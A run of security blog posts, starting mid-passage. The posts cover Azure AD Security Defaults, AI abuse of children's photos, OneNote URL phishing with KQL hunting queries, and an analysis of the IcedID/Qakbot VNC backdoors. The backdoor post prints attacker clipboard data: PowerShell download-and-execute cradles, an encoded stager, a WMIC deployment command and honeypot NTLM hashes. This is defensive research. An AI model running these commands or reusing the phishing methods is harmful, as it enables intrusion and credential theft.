Finally, let’s go over some Microsoft 365 principles. When an organization signs up for a subscription of Microsoft 365, an Azure AD tenant is created as part of the underlying services. For data residency requirements, Microsoft lets you choose the logical region where you want to deploy your instance of Azure AD. This region will determine the location of the data center where your data will be stored. Moreover, Microsoft 365 uses Azure AD to manage user identities. Azure AD offers the possibility to integrate with an on-premises Active Directory Domains Services (AD DS) but also to manage integrated applications. Therefore, you should/must/have to understand that most of the work to set up a Zero Trust approach will be done in Azure AD.

Let’s get started!

Our organization just bought a paid Microsoft 365 subscription which comes with a free subscription to Microsoft Azure AD. The free Azure AD subscription includes some basic features that will allow us to get started with our journey. Let’s go over them!

Security Defaults

The first capability is the Azure AD Security Defaults. The Security Defaults are a great first step to improve the security posture by enforcing specific access controls:

  • Unified Multi-Factor Authentication (MFA) registration: All users in the tenant must register to MFA. With Security Defaults, users can only register for Azure AD Multi-Factory Authentication by using the Microsoft Authenticator app using a push notification. Note that once registered, users will have the possibility to use a verification code (Global Administrator will also have the possibility to register for phone call or SMS as second factor). Another important note is that disabling MFA methods may lead to locking users out of the tenant, including the administrator that configured the setting, if Security Defaults are being used;
  • Protection of administrators: Because users that have privileged access have increased access to an environment, users that have been assigned to specific administrator roles are required to perform MFA each time they sign in;
  • Protection of users: All users in the tenant are required to perform MFA whenever necessary. This is decided by Azure AD based on different factors such as location, device, and role. Note that this does not apply to the Azure AD Connect synchronization account in case of a hybrid deployment;
  • Block the use of Legacy Authentication Protocols: Legacy authentication protocols refer to protocols that do not support Multi-Factor Authentication. Therefore, even if a policy is configured to require MFA, users will be allowed to bypass MFA if such protocols are used. In Microsoft 365, legacy authentication is made from clients that don’t use modern authentication such as Office versions prior to Office 2013 a mail protocols such as IMAP, SMTP, or POP3;
  • Protection of privileged actions: Users that access the Azure Portal, Azure PowerShell or Azure CLI must complete MFA.

These features already allow to increase the security posture by enforcing strong authentication. Therefore, they can be considered a first step for our organization that just started to use Microsoft 365 and is still researching/evaluating/ the different possibilities.

If we want to enable Security Defaults, we go to the Azure Portal > Active Azure Directory > Properties > Manage Security Defaults:

Enable Security Defaults in Azure AD
Enabling Security Defaults

However, there are important deployment considerations to be respected before enabling Security Defaults. Indeed, it is a best practice to have emergency accounts. These accounts are usually assigned the Global Administrator role, the most privileged role in Azure AD/Microsoft 365 and are created to enable access to the environment when normal administrator accounts can’t be used. This could be the case if Azure AD MFA experiences outages. Because of the purpose of such accounts, these users should either be protected with a very strong first authentication method (e.g., strong password stored in secure location such as a physical vault that can only be accessed by a limited set of people under specific circumstances) or use a different second authentication factor than other administrators (e.g., if Azure AD MFA is used for administrator accounts used regularly, a third party MFA provider, such as hardware tokens, can be used). But here is the problem: this is not possible when using Security Defaults.

Per-user MFA settings

Note that the per-user MFA settings, also known as legacy multifactor authentication, will be deprecated on September 30th, 2024.

The second capability with an Azure AD free license is the per-user MFA settings. These settings can be used to require Multi-Factor Authentication for specific users each time they sign in. However, some exceptions are possible by turning on the ‘Remember MFA on trusted devices’. Note that when enabled this setting will allow users to mark their own personal or shared devices as trusted. This is possible, because this setting does not rely on any device management solution. Users will only be asked to reauthenticate every few days or weeks when selecting this option. The interval depends on the configuration.

We usually do not recommend using the ‘Remember MFA on trusted devices’ setting unless you do not want to use Security Defaults and do not have Azure AD Premium licenses. Indeed, this setting allows any user to trust any device, including shared and personal devices, for the specified number of days (between one and 365 days). However, these settings can be configured in the portal.

In the user settings, MFA can be enabled for each individual user.

Per-user MFA settings in Azure AD
Per-user MFA users settings

Then, in the service settings, we can allow users to create app passwords for legacy applications that do not support MFA, select authentication methods that are available for all users, and allow or not users to remember Multi-Factor Authentication on trusted devices for a given period of time. Note that the trusted IP addresses feature requires an additional license (Azure AD Premium P1) that we do not have for the moment.

Legacy MFA settings in Azure AD
Per-user MFA service settings


These two features are quite different but allow us to achieve the same goal, to enforce strong authentication, i.e., MFA, for all or some users.

For our organization we will choose the Security Defaults for multiple reasons:

  • The per-user MFA settings can become unmanageable quickly. This is especially true for growingorganization.With more people and a complex environment, exceptions will be required, and it will become difficult to keep track of the configuration and keep a good baseline. Security Defaults, respectively,allow to enforce a standard baseline for all users;
  • By using per user MFA users will be prompted for MFA every time they sign in.. This badly affects user experience and productivity might be impacted;
  • Security Defaults blocks legacy authentication protocols that might be used to bypass MFA in some cases. This prevents identities, including administrators, from being targeted by brute force or password spraying attacks and help mitigating the risk of successful phishing attacks to a certain extent;
  • Multi-Factor Authentication registration is enforced with Security Defaults for all users meaning that all users will be capable of doing MFA if required.

By going that way we need to consider that exclusions are not possible. Therefore, emergency accounts or user accounts used as service accounts (which it is not recommended to have as they are inherently less secure than managed identities or service principals) might be blocked. Nevertheless, as we are just evaluating the Microsoft 365 products, we can accept that the environment and cloud applications are unavailable for a few hours without any major impact on business processes. However, this might be an crucial point in the future.

Finally, it is important to note that these two features do not allow to configure more granular controls as we will see later in this series.


In this first blog post, we have seen different possibilities to enforce access restrictions that can be implemented when an organization just starts its journey in Microsoft 365:

  • Per-user MFA settings: Allow to enforce MFA for specific users but can become quickly unmanageable and does not provide granular controls;
  • Security Defaults: Allow to enforce a strong authentication mechanism and to block legacy authentication protocols that may allow users to bypass MFA. This solution is recommended over the per-user MFA settings. However, note that MFA might not be required in most cases which is not ideal.

In brief, we can see that both solutions have limitations and will not be suitable for most organizations. Indeed, there are still many aspects, such as restricting access based on specific conditions, that are not covered by these capabilities. We will go over additional key features as well as our recommendations for the implementation of a Zero Trust approach in Microsoft 365 in future blog posts.

In the next blog post, we will see how we can protect our environment against external users and applications.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

An Innocent Picture? How the rise of AI makes it easier to abuse photos online.


The topic of this blog post is not directly related to red teaming (which is my usual go-to), but something I find important personally. Last month, I gave an info session at a local elementary school to highlight the risks of public sharing of children’s pictures at school. They decided that instead of their photos being publicly accessible, changes would be implemented to restrict access to a subset of people. However, there are many more instances of excessive sharing of information online; photographers’ portfolios, youth/sports clubs, sharenting on social media, etc.

There are many risks stemming from this type of information being openly available, and the potential risks have only increased with the rise of artificial intelligence. Since you are reading this post on the NVISO blog, I’m assuming you are more cyber-aware than the average person out there and therefore perfectly positioned to use the takeaways from this post and spread the word to others. Obligatory Simpsons reference:

Since the children themselves may not have a say in the matter yet and the people who do may not be aware of the possible dangers, it’s up to us to think of the children!

Traditional Risks

When thinking of the risks linked to the presence of children’s pictures online, an obvious threat is the type of person that might drive a van like this:

There are three traditional risks we will be discussing here:

  • Kidnapping
  • Digital Kidnapping
  • Pornographic Collections


How does a picture of a child pose a risk for physical kidnapping? First of all, a picture could give away a physical location, for example due to the presence of street signs/names, recognizable elements such as shops, bars, monuments, schools, etc. If this is a location frequented by the child, a possible child predator could identify an opportunity for kidnapping there.

In case no identifiable elements are present, certain people might still giveaway the location due to oversharing. Imagine a picture on a Facebook profile that is publicly accessible with comments such as “birthday party at …”, “visiting grandma & grandpa in …”, “always a fun day when we go to …”. Often-visited locations can be deduced from comments like these.

Finally, a more technical approach is looking at the picture’s metadata, which often gives information about the type of camera that was used, shutter time, lens, etc. but can also contain an exact location where the picture was taken. No additional research is required to figure out where the child has been.

Digital Kidnapping

With digital kidnapping, the victim is affected by some type of identity fraud. Pictures of the child are stolen and reused by people online on their own social media, often pretending to be related to the children. An example could be an adoption fantasy, reposting pictures of the child for likes and comments without the child or its parents knowing about this.

Another, more dangerous form of digital kidnapping consists of a sexual predator reusing the victim’s pictures to target other possible victims. Someone could pretend to be a young child themselves to lure other children into meeting with them online or sharing potentially explicit pictures.

Pornographic Collections

Continuing on the topic of potentially explicit pictures, it is not a secret that the Dark Web is full of pornographic pictures of children. However, pictures that you or I would not consider to be risky or explicit could end up in such collections as well. Holiday pictures of children in swimsuits are happily shared by child predators in an attempt to fulfill their fantasies. They search through social media to identify such pictures, sharing them among each other along with sexual fantasies. With pictures of a certain child, they might search for pictures of lookalike children to add to their fantasy. With only a textual story, they might search for pictures of children that match the story.

However, these risks have been existent for a number of years already. What’s more dangerous is that the life of a child predator looking for pictures has been facilitated with rise of artificial intelligence.

Next-gen Risks

So what is the problem with public pictures? Not only can they be retrieved by anyone browsing the web, but they can and will also be gathered by automated systems through concepts called spidering and scraping. These activities aren’t particularly nefarious and actually part of the regular functioning of the web, used by search engines for example. However, other applications can make use of these same techniques and have already done so to create massive collections of pictures, even those you would not expect to be public, such as medical records

Facial Recognition

One such example is ClearView AI, which is aimed at law enforcement by applying its facial recognition algorithm to a huge collection of facial images to help with investigative leads. However, for the broader public, a similar application has become available, allowing anyone to upload a picture and receive an overview of other pictures with matching faces. While probably having legitimate use cases, PimEyes provides people with less honorable intentions an easy way to add a high-tech touch to the traditional risks mentioned above. If you haven’t heard about PimEyes yet, it allows to upload a picture of someone’s face, after which the application will provide you with a collection of matching pictures. The tool is already quite controversial, as evidenced by the articles below:

As an example, we provided PimEyes with the face of the middle child selected from the stock photo on the left below, which resulted in a set of pictures containing the same child:

Of course, the algorithm identifies the pictures that are part of the same set of stock pictures. When trying this out with a private picture of someone, the set of results contained distinct public pictures with the same person. The algorithm was able to identify them in pictures of low quality or with the person wearing a hat or mouth mask covering a large part of the face. Scary stuff, especially considering what you could be able to do with this output:

  • Imagine a picture of a child without any hints towards the location (e.g. stolen from Facebook or other social media). Upload it to PimEyes and you might be able to link the child’s face to other public pictures where a location can easily be deducted (such as a school website for example). You now know locations where the child may frequently be present.
  • Remember in one of the previous paragraphs where we said “With pictures of a certain child, they might search for pictures of lookalike children to add to their fantasy.” Well, this type of technology automates the task.
  • Resources above mention a woman having found sexually explicit content through facial recognition. Imagine your child falling victim to revenge porn in the future and having those pictures exposed. Through PimEyes it may even be possible that such pictures are shown in the results together with pictures of when the victim was still a child.

Of course, in addition to these “extreme cases”, in the future it may very well be that possible employers don’t just google your name, but also search your face before an interview. The results may consist of shameful pictures you would rather not have an employer see. There could be a psychological effect as well; maybe in the past you were struggling with certain physical conditions (e.g. being overweight) or affected by other conditions which are no longer relevant at the time when someone tries to find your older pictures. Being confronted with that type of past content may be a painful experience.

Generation of previously non-existent content

We’ve all been playing around and having a lot of fun with ChatGPT, DALL-E, and other AI models. While it is is possible to generate a picture from a textual prompt, it is also possible to take an existing image and swap out parts of the image based on a textual prompt. What could possibly go wrong? OpenAI does mention following protections having been put in place: “… we filtered out violent and sexual images from DALL·E 2’s training dataset. Without this mitigation, the model would learn to produce graphic or explicit images when prompted for them, and might even return such images unintentionally in response to seemingly innocuous prompts … “ Let’s see what we are able to do with some stock photos.

Starting off from the same stock photo, I erased the bottom part – very amateuristically I admit – so that it can be completed again by DALL-E:

Using a fairly innocent prompt (“modify the image to portray the children at the beach in swimming gear”), which could however be the type of picture child predators are after, we get the following possible images (note that we have blurred the resulting images):

Alright, these first two images do indeed look like a fun day at the beach, with an inflatable tire, bucket, and what looks like sand. The third image on the other hand, did surprise me a bit. This time, the girls have received shorts and the middle child even has some cleavage generated (adding to our decision of blurring the image). Do note that this is the result with an innocent prompt, specifically mentioning it is about children, and with mitigations against the generation of explicit content built-in by removing sexual images from the training set. Let’s leave it at this for this photo and try to generate something a bit more suggestive starting from this stock picture resulting from “business woman” as a search term. When asking to “turn this into a pin-up model”, starting from just the neck and head, we are able to receive some spicier results:

So this is what we can create from a completely random picture on the internet without having any photo editing skills. Now imagine this result applied to pictures of children and the risks are obvious.

Taking things a step further, other applications may not have the same limitations applied to their training data and are as a result clearly biased towards female nudity. The popular avatar app “Lensa” is known to return nude or semi-nude variations of photos for female users, even when uploading childhood pictures, as evidenced in following articles:

Taking things another step further, certain apps or services are specifically aimed at the creation of sexually explicit content in the form of deepfakes. Deepfakes are computer-generated images or videos that make use of machine learning to replace the face or voice of someone with that of someone else. Usually this consists of fake pornographic material targeting celebrities. However, deepfake content of adult women personally known to the people wanting to create deepfakes is on the rise, in part due to the ease with which you can create such content or request to have this content created.

However, applying deepfake technology to photo or video content of children is unlikely to remain off-limits for some people and the report above states that already some of the victims of the DeepNude telegram bot appear to be under 18.

There is no doubt that artificial intelligence and machine learning are here to stay. With all of their legitimate and highly useful applications, there is inevitably the potential for abuse as well. The only thing we can do as cybersecurity professionals, parents, friends, … is limiting the attack surface as much as possible and trying to make those close to us aware of the dangers.

Tips on reducing the risks

Some general tips we can take into account to protect ourselves and our children include:

  • Determine for yourself and your children what kind of information you are willing to share online and make this desire clear to others. Respect other people’s wishes in this regard. Some people may not like it when you post a picture of them or their children on your social media, even if it is a group picture.
  • Share pictures privately instead of via social media, e.g. mail pictures of the birthday party to a selection of recipients instead of posting online.
  • If you do want to post pictures on your social media, limit the target audience to friends or people you know. As an extension, make sure you only accept connections of people you know.
  • Avoid metadata and limit details regarding location and other information that could give away a location. Some additional guidance on removing metadata provided by Microsoft here.


Public pictures can easily be scraped into huge collections that are used for different purposes. While traditional risks (such as sharing on the Dark Web) linked to pictures of children are well-known, emerging technologies such as artificial intelligence and machine learning have opened Pandora’s Box for potential abuse. These collections of gathered pictures can be used for facial recognition or generation of new, possibly explicit content. The resulting dangers may not only manifest now, but perhaps years in the future. As such, it is not only about protecting the child they are today, but also the adult they will become.

About the author

You can find Jonas on LinkedIn

Jonas Bauters

Jonas Bauters is a manager within NVISO, mainly providing cyber resiliency services with a focus on target-driven testing.
As the Belgian ARES (Adversarial Risk Emulation & Simulation) solution lead, his responsibilities include both technical and non-technical tasks. While occasionally still performing pass the hash (T1550.002) and pass the ticket (T1550.003), he also greatly enjoys passing the knowledge.

OneNote Embedded URL Abuse

OneNote Embedded URL Abuse

In my previous blogpost I described how OneNote is being abused in order to deliver a malicious URL. In response to this attack, helpnetsecurity recently reported that Microsoft is planning to release a fix for the issue in April this year. Currently, it’s still unknown what this fix will look like, but from helpnetsecurity’s post, it seems like Microsoft’s fix will focus on the OneNote embedded file feature.
During my testing, I discovered that there is another way to abuse OneNote to deliver malware: Using URLs. The idea is similar to how Threat Actors are already abusing URLs in HTML pages or PDFs. Where the user is presented with a fake warning or image to click on which would open the URL in their browser and loads a phishing page.

The focus of this blogpost will be on URLs withing a OneNote file that is delivered via an attachment. Not a URL that leads to OneNote online.

There are 3 ways to deliver URLs via a OneNote file.

  1. Just plainly paste your URL in the OneNote file (Clickable URL)
  2. Make some text (like “Open”) clickable with a malicious URL (Clickable text)
  3. Embed URLs in pictures (Clickable picture)

Now it is important to note that these 3 ways rely on social engineering and tricking the user to click your URL or picture, either via instructions or deceiving the user. We have seen this technique being used through OneDrive and SharePoint online already

So, let’s create some examples and see what this attack could look like.

URLs in OneNote

Clickable URLs

The most straightforward way is to just put a URL in a OneNote file. In an actual phishing email, the OneNote file will probably not just contain the URL alone. To make things more believable, Threat Actors could potentially write a small story or an “encrypted” message in the OneNote file (an example of this can be observed below). The idea would then be to convince the user into clicking the URL in order to “decrypt” the message. Once clicked on the URL, the user would then either have to download something or provide credentials to “log in”.

If you would like to read the message in the OneNote file, you would have to click the URL. Which could then lead to the download of a malicious file or a credential harvest page.
An example of such an “encrypted” message could be:

An example of a fake encrypted message where a user has to click a URL to decrypt it

Clickable text

Similar to clickable URLs, you can hide a URL behind normal text. Once you hover over the URL, you will see where it points towards. If the address points to wards a malicious domain that uses typo squatting (e.g. g00gle[.]com instead of google[.]com) then Threat Actors could fool the human eye.

The text “open” hiding a malicious URL

The issue here lies in the fact that once you click the “open” text, you will immediately be redirected to the website. There is no pop up asking if you really want to visit the website.
Taking this technique into account, it is also possible to use our “encrypted message” example from before and make the user think they will visit a legitimate page but embed a different URL:

The visible URL “; is hiding a malicious URL

Clickable Pictures

To create an embedded URL in a picture, right-click your picture, and Click “Link…”

Here you can put a URL to your malicious file or phishing page. Yes, you could spin this story so that you would have to authenticate and login, to your browser with a fake login website.
Do note that to open a URL that is embedded within a picture, you will need to hold the CTRL key and click the image. The phishing document will have to instruct the user to hold CTRL and click the picture; however, I do not see this as an obstacle for threat actors.

A picture with the button “open” that has an embedded malicious URL

Detection Capabilities

On OneNote Interaction

Opening the URL, will launch the default browser. This can be translated to OneNote spawning a child process, which is the browser. A full process flow could look something like this:

Process execution of explorer.exe > Outlook.exe > OneNote.exe > firefox.exe

Do note that, as typically done so by Outlook, once you click the file, it saves a copy in a temporary cache folder (depending on your version of outlook, this can be a slightly different place than is shown above here, but generally, you will have the name INetCache and Content.Outlook in the folder path.)

A quick hunting rule for this behaviour can be to look for the process tree that was observed before. This process tree can be adjusted to the needs of your environment, depending on what browser is being used (e.g. if you are running brave.exe, you should include this in the “FileName” section of the query)

| where InitiatingProcessFileName contains "onenote.exe"
| where FileName has_any ("firefox.exe","msedge.exe","chrome.exe")

Now if you’d like a more “catch all” approach, the last line can be replaced with a query that looks at the command line and looks for http or other protocols like ftp, as both chromium & Firefox-based browsers accept URLs as a command line argument to open a specific website.

| where ProcessCommandLine has_any ("http","ftp")

On Email Delivery

During our tests, Microsoft Defender was unable to detect and extract the URLs that were embedded in the OneNote file, as can be observed in the screenshot below. Defender was unable to extract the URLs from the OneNote files, nor was it able to show that a URL was embedded in the file.

No URLs extracted from the OneNote Attachment

This also means that Microsoft does not create a safe link for the URL and thus a threat actor can bypass the “potential malicious URL clicked” alert which helps against phishing pages, as this looks at URL clicks, which is impossible if no URLs are detected


Whilst embedded files within OneNote are currently still a big threat, you shouldn’t forget that there are other ways of abusing OneNote features that can be used for malicious intent. As we observed, Microsoft does not extract the URLs from a OneNote file and there are multiple ways of avoiding detection & tricking the user into clicking a URL. From there, the same tactics are used to deliver second stage malware, be it via ISO file or ZIP file that contains malicious scripts.

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Threat Hunting, Malware analysis & Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

IcedID & Qakbot’s VNC Backdoors: Dark Cat, Anubis & Keyhole


IcedID (a.k.a. BokBot) is a popular Trojan who first emerged in 2017 as an Emotet delivery. Originally described as a banking Trojan, IcedID shifted its focus to embrace the extortion/ransom trend and nowadays acts as an initial access broker mostly delivered through malspam campaigns. Over the last few years, IcedID has commonly been seen delivering Cobalt Strike prior to a multitude of ransomware strains such as Conti or REvil.

IcedID itself is composed of multiple modules, one of which is a poorly documented VNC backdoor (Virtual Network Computing) acting as a cross-platform remote desktop solution. Existence of this module (branded “HDESK” or “HDESK bot”) is just partially mentioned by Malwarebytes (2017) and Kaspersky (2021) while its usage has been widely observed and occasionally vulgarized as “Dark VNC”.

As part of our research efforts, NVISO has been analyzing IcedID and Qakbot’s command & control communications. In this blog-post we will share insights into IcedID and Qakbot’s VNC backdoor(s) as seen from an attacker’s perspective, insights we obtained by extracting and reassembling VNC (RFC6143) traffic embedded within private and public captures published by Brad Duncan.

In this post we introduce the three variants we observed as well as their capabilities: Dark Cat, Anubis and Keyhole. We’ll follow by exposing common techniques employed by the operators before revealing information they leaked through their clipboard data.

Bokbot or Qakbot?

This research was originally titled “IcedID’s VNC Backdoors: Dark Cat, Anubis & Keyhole” and focused solely on IcedID (Bokbot). Brad however correctly pointed-out that Dark Cat is only leveraged by Qakbot, samples which were mistakenly included in this research after being confused with Bokbot (IcedID).

IcedID and Qakbot VNC traffic remains extremely similar as can be observed in the following three VNC backdoors.

HDESK Variants

During our analysis of both public and private IcedID and Qakbot network captures, we identified 3 VNC backdoor variants, all part of the HDESK strain. These backdoors are typically activated during the final initial-access stages to initiate hands-on-keyboard activity. Supposedly short for “Hidden Desktop”, HDESK leverages Windows features allowing the backdoor to create a hidden desktop environment not visible to the compromised user. Within this hidden environment, the threat actors can start leveraging the user interface to perform regular tasks such as web browsing, reading mails in Outlook or executing commands through the Command Prompt and PowerShell.

We believe with medium confidence that these backdoors share origins as the the Dark Cat interface (used by Qakbot) has traits that can later be found within Anubis and Keyhole interfaces (used by IcedID).

Dark Cat VNC

The “Dark Cat VNC” variant was first observed in November 2021 and is believed to be the named releases v1.1.2 and v1.1.3 used by Qakbot. Its usage was still extensively observed by the end of 2022. Upon initial access, the home screen presents the operator with multiple options to create new sessions alongside backdoor metrics such as idle time or lock state.

Figure 1: The Dark Cat VNC interface.
Figure 1: The Dark Cat VNC interface.

User Session

Figure 2: A Dark Cat USER session.

The USER session exists in three variations (read, standard and black) which allows the operator to switch the VNC view to the user’s visible desktop.

HDESK Session

The HDESK session exists in three variations as well: standard, Tmp and NM (also called bot). This session type causes the backdoor to create a new hidden desktop not visible to the compromised user.

Based on the activity we observed, the HDESK sessions are (understandably) preferred by the operators.

Figure 3: A Dark Cat HDESK session.

As HDESK sessions by default do not benefit from Windows’s built-in UI, operators are presented with an alternative start-menu to launch common programs. In Dark Cat these are Chrome, Firefox, Internet Explorer, Outlook, Command Prompt, Run and the Task Manager. A Windows Shell button is also foreseen which we believe, if used, will spawn the regular Windows UI most of the users are used to. Starting with Dark Cat v1.1.3 Edge Chromium furthermore joins the list of available software.

Figure 4: The Dark Cat HDESK session interface.
Figure 4: The Dark Cat HDESK session interface.

Besides the alternate start-menu, operators can access some settings using the top-left orange icon which includes:

  • Defining the hidden windows’ sizes.
  • Defining the Chrome profile to use (lite or not).
  • Deleting the browser’s profile(s).
  • Killing the child process(es).
Figure 5: The Dark Cat HDESK settings interface.

WebCam Session

The WebCam sessions exist in three variations. While we were unable to capture its usage (honeypots lack webcams and operators do not attempt to use this session kind), its presence suggests IcedID’s VNC backdoors are capable of capturing compromised devices’ webcam feeds.

Anubis VNC

The “Anubis VNC” variant was first observed in January 2022 and is believed to be the named release v1.2.0 used by IcedID. Its usage was last observed in Q3 2022. No capability differences were observed between Anubis and Dark Cat v1.1.3.

Figure 6: The Anubis VNC interface.
Figure 6: The Anubis VNC interface.


The “KEYHOLE VNC” variant was first observed in October 2022 and is believed to be the named releases v1.3 as well as v2.1. Its usage was observed as recently as Q1 2023.


The first major change observed within Keyhole is its new color palette capability where operators can pick regular RGB (a.k.a. colored) or Grayscaled (a.k.a. black & white) feeds. The actual intend of this feature is unclear as, at least from a network perspective, both RGB and Grayscale consume as many bytes per pixel, resulting in equal performances.

Figure 7: The Keyhole color palette selector.
Figure 7: The Keyhole color palette selector.

HDESK Sessions

Keyhole v1.3 provides a refreshed start-menu where icons have been updated and options renamed; The once cryptic Win Shell option has been rebranded to the My Computer option.

Figure 8: The Keyhole (v1.3) HDESK session interface in gray-scaled color palette.
Figure 8: The Keyhole (v1.3) HDESK session interface in gray-scaled color palette.

Later-on, with v2.1, Keyhole renamed additional options and introduced the PowerShell and Desktop options. We assess with low confidence that the Desktop option only differs from the My Computer option by rendering the background as well, whereas the latter option was only seen generating desktop views without background image.

Figure 9: The Keyhole (v2.1) HDESK session interface.
Figure 9: The Keyhole (v2.1) HDESK session interface.

Modus Operandi

Obtaining recordings of threat actors operating is useful to understand which technical capabilities they are equipped with, but also allows the identification of TTPs (Tactics, Techniques & Procedures) they might employ. In the following section we will review some of the most re-occurring actions we observed IcedID and Qakbot operators perform through the above described backdoors.

🍯 Nothing confidential here…
All media published within this section were reconstructed from publicly published artifacts. As all information is public, we have refrained from redacting otherwise sensitive details such as company names and accounts.

Task Manager

To no surprise, the usage of the Task Manager to identify running software was extremely common. While hard to detect as operators did not attempt to interfere with security software, the usage of this graphical utility outlined one interesting drawback. On multiple (non-published) occasions we observed actors identifying known security tooling based on the process icon whereas other icon-less tooling blended in with many of Windows’ icon-less applications.

Figure 10: An Anubis operator performing interactive reconnaissance through the Task Manager.


Another quite common technique was the inspection of Outlook, most likely to identify poorly-populated honeypot networks. As was the case for the Task Manager, the graphical usage of Outlook by the operator is indistinguishable from regular user activity. From the available recordings, no attempts were made to use Outlook for further phishing/spam.

Figure 11: An Dark Cat operator performing interactive reconnaissance through Outlook.
Figure 12: A Dark Cat operator inspecting Outlook's "Rules and Alerts" settings.
Figure 12: A Dark Cat operator inspecting Outlook’s “Rules and Alerts” settings.

On one singular instance, we observed the actor expressing interests in Outlook’s rules. The backdoor session was however terminated before they undertook any actions making it unclear whether this was part of the reconnaissance activities or were planning to set up malicious email redirection rules.

Web Browsers

From the available browsers, Edge and Chrome were the favorites. Using these, operators commonly validated the browser’s connectivity by accessing Amazon.

During one intrusion, the operator went as far as attempting to access the compromised user’s Amazon payment information. This attempt is a good reminder that beyond a user’s corporate identity, personal accounts are definitely at risk as well.

Figure 13: A Dark Cat operator accessing Amazon's "Your Payments" account page.
Figure 13: A Dark Cat operator accessing Amazon’s “Your Payments” account page.
Figure 14: A Keyhole operator inspecting Edge's version details.
Figure 14: A Keyhole operator inspecting Edge’s version details.

On some occasions operators accessed the edge://version URL. While this page exposes mostly useless information to attackers, the capture provides a sheer amount of uncommon flags usable for threat hunting.

Noteworthy is the Profile path located within the user’s temporary directory and passed using the --user-data-dir= flag, a pattern that from our available telemetry seems quite uncommon for msedge.exe in enterprise environments. The pattern is however occasionally used for applications such as opera_autoupdate.exe and msedgewebview2.exe.

Also worth noting is the usage of edge://settings/passwords to identify additional accounts.

Figure 14: A Keyhole operator interactively inspecting Edge's stored passwords.
Figure 14: A Keyhole operator interactively inspecting Edge’s stored passwords.
Figure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat session.
Figure 15: Edge displaying a warning banner due to the usage of an unsupported flag during a Dark Cat session.

A final commonly observed pattern is the usage of the unsupported --no-sandbox command-line flag in Edge resulting in a notification banner. From our available telemetry in enterprise environments, the usage of this flag for Edge is uncommon, as opposed to Electron-based applications (including Microsoft Teams and WhatsApp) who extensively use it.


Another commonly observed utility to inspect the compromised devices’ files and folders, including payloads dropped through other channels, is Windows Explorer. As was the case with Outlook, Explorer’s usage is indistinguishable from legitimate use making it a hard to detect technique.

Figure 16: A Keyhole operator interactively using Explorer to inspect folders.

Command Prompt

Last but not least, the command prompt was obviously used extensively. Usage of the command prompt is commonly leveraged for reconnaissance activities, including the usage of:

  • whoami /upn for system user discovery (T1033).
  • ipconfig for system network configuration discovery (T1016).
  • arp -a for both remote system discovery (T1018) and device identification based on the MAC address.
  • dir for file and directory discovery (T1083) over SMB (T1021.002).
  • nltest /dclist for the remote discovery of the domain controllers (T1018).
  • ping for network connectivity tests to remote systems (T1018).
  • PowerShell (T1059.001) to deploy Cobalt Strike.

As opposed to the previous mostly passive TTPs, the active usage of the Command Prompt and PowerShell is often where detection rules obtain a competing chance.

Figure 17: An Anubis operator performing initial reconnaissance using the Command Prompt in an HDESK session.

Clipboard Leaks

As VNC acts as a remote desktop solution, another trove of data was found within the clipboard synchronization feature. By copy/pasting between victim and attacker machines, operators exposed some additional TTPs and information surrounding their operations.

In this section we will expose the most common and interesting data found within their clipboards.

Cobalt Strike

As expected, many variations of Cobalt Strike downloaders were observed. These leveraged both IPs and domain names, as well as standard and non-standard ports such as HTTP on port 443 or HTTPS on port 8080.

IEX ((new-object net.webclient).downloadstring(''))
IEX ((new-object net.webclient).downloadstring('')) 
IEX ((new-object net.webclient).downloadstring(''))
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

In some cases, the operators directly leveraged PowerShell shellcode stagers as shown in the following trimmed command.

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA...AGQAKAApADsA

For compromised accounts with sufficient access, WMIC commands were further issued to deploy Cobalt Strike on remote appliances.

C:\Windows\System32\wbem\wmic.exe /node: process call create "cmd.exe /c powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring(''))"""

Finally, although we were unable to identify which tooling would rely on such a format, actors leaked what appears to be a naming convention.



Besides Cobalt Strike, operators exposed a DllRegisterServer command which Unit 42 observed being used with rundll32.exe and attributed to the deployment of a VNC backdoor.

DllRegisterServer --id %id% --group %group% --ip,,,,,,,,,,

NTLM Hashes

Another interesting finding was the presence of NTLM hashes within the clipboard data, exposing the compromise’s scope. In this case, the impacted organization was part of a honeypot environment.

DESKTOP-4GDQQL7\admin 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\Administrator 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\bennie.mcbride 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\brenda.richardson 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\saul.underwood 4081e42481a5986e9bfcb7000bbe98f4
DESKTOP-4GDQQL7\WDAGUtilityAccount 7cd5fddee0cd00dde47014fe7f52faa4
TECHHIGHWAY-DC\krbtgt a7b565c147b69380d0b35f37ce478a1c

Attacker Notes

While the above findings do not aid attribution, one operator did leak their intrusion notes. Within these notes (“[...]” trimmed for readability) we can observe Russian annotations, commonly related to CIS-based crime groups, as well information on then-ongoing breaches. A couple of days after the network traffic was taken, two non-honeypot companies mentioned within these notes were listed on the Black Basta ransomware group’s leak site.

Hostname CTYMNGR1 =ist  ne v domene
Hostname PCCXCNAU001 (4)-no ad/da/error 
Hostname W10EQZAFI10027 -?ff ne prishla
Hostname NPD104 -24 host (7)
Hostname DESKTOP-3R921OV -small
Hostname CAS-TAB0010 [...] 28m 9prosto) yshla v off/sdelal zakrep MSNDevices? 
Hostname PC-REC-LEFT-10 --???? ? ?? ????
Hostname TRAINING - w 20m (???) razobral
Hostname RM6988 32m (??????) ?????????? ? ???? ?? ?????????? ???????? + ???????? ??????? 
Hostname EXIRP316151 ?????? ?? ????? ???????
Hostname ADMIN201 ???? ? ???
